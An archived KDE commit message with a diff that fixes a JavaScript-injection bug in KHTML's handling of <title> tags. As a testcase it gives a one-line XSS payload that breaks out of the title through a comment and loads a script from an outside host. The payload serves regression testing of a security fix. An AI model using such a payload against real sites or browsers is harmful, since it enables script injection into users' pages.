'branches/KDE/3.5/kdelibs/khtml/html'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       kde-commits
Subject:    branches/KDE/3.5/kdelibs/khtml/html
From:       Dirk Mueller <mueller () kde ! org>
Date:       2007-01-24 16:15:55
Message-ID: 1169655355.952280.32313.nullmailer () svn ! kde ! org
[Download RAW message or body]

SVN commit 626791 by mueller:

fix javascript insertion in <title> tags as described in:
http://www.securityfocus.com/archive/1/457763/30/30/threaded

basically, we want to parse comments in titles, to avoid capturing
a <script> tag by accident. Easy fix.

Testcase:
<title>myblog<!--</title></head><body><script
src=http://beanfuzz.com/bean.js> --></title>


 M  +2 -2      htmltokenizer.cpp  


--- branches/KDE/3.5/kdelibs/khtml/html/htmltokenizer.cpp #626790:626791
@@ -316,7 +316,7 @@
     while ( !src.isEmpty() ) {
         checkScriptBuffer();
         unsigned char ch = src->latin1();
-        if ( !scriptCodeResync && !brokenComments && !textarea && !xmp && !title && \
ch == '-' && scriptCodeSize >= 3 && !src.escaped() && QConstString( \
scriptCode+scriptCodeSize-3, 3 ).string() == "<!-" ) { +        if ( \
!scriptCodeResync && !brokenComments && !textarea && !xmp && ch == '-' && \
scriptCodeSize >= 3 && !src.escaped() && QConstString( scriptCode+scriptCodeSize-3, 3 \
).string() == "<!-" ) {  comment = true;
             scriptCode[ scriptCodeSize++ ] = ch;
             ++src;
@@ -495,7 +495,7 @@
 
             if (canClose || handleBrokenComments || scriptEnd ){
                 ++src;
-                if ( !( script || xmp || textarea || style) ) {
+                if ( !( title || script || xmp || textarea || style) ) {
 #ifdef COMMENTS_IN_DOM
                     checkScriptBuffer();
                     scriptCode[ scriptCodeSize ] = 0;


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic